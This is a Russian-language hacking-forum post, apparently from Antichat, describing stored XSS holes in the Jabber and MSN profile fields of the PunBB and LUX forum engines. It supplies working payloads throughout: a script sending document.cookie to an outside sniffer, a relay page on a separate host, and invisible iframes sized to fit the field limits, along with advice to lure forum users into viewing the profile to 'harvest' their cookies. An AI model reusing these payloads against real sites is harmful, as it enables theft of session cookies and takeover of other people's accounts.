Форум АНТИЧАТ - XSS в форумах PunBB и LUX

И опять дыра в профиле....что в принципе хорошо, для нас=)

1 уязвимость найдена мной в форуме punbb, позволяет вставить скрипт, в поле Jabber, что находится в профиле.
Так как длинна ограничена 75 символами, следует кроме банального алерта

Код:

"><script>alert('')</script>

стандартный скрипт для пересылки куков на снифф

Код:

<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>

вставить как бы и не удастся. Но мы поступим по другому. Зарегестрируем, к примеру, на .holm`e такой сайт: r.h15.ru
и в корневую папку кинем html`овский файл index.html, со строкой

Код:

<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>

т.е. сделаем небольшой редирект на античатовский сниффер. Теперь, поместив в поле Jabber строку с невидимым фреймом

Код:

"><iframe src=http://r.h15.ru/index.html height=0></iframe>

в котором отображается страница нашего редиректа, кукисы всех кто заглянет на эту страницу улетят на снифф античата.
Осталось только заманить пользователей форума заглянуть в твой профайл, и можно идти собирать урожай=)

2 уязвимость найдена в форуме lux. Форум итальянский, и довольно распостраненный, у итальянцев.
Тут, поле подверженное нашему воздействию называется MSN, количество вводимых символов ограничено 40, вставляем сплойт

Код:

"><iframe src=http://r.15.ru/ height=0>

который занимает как раз 38 символа, и добываем кукисы.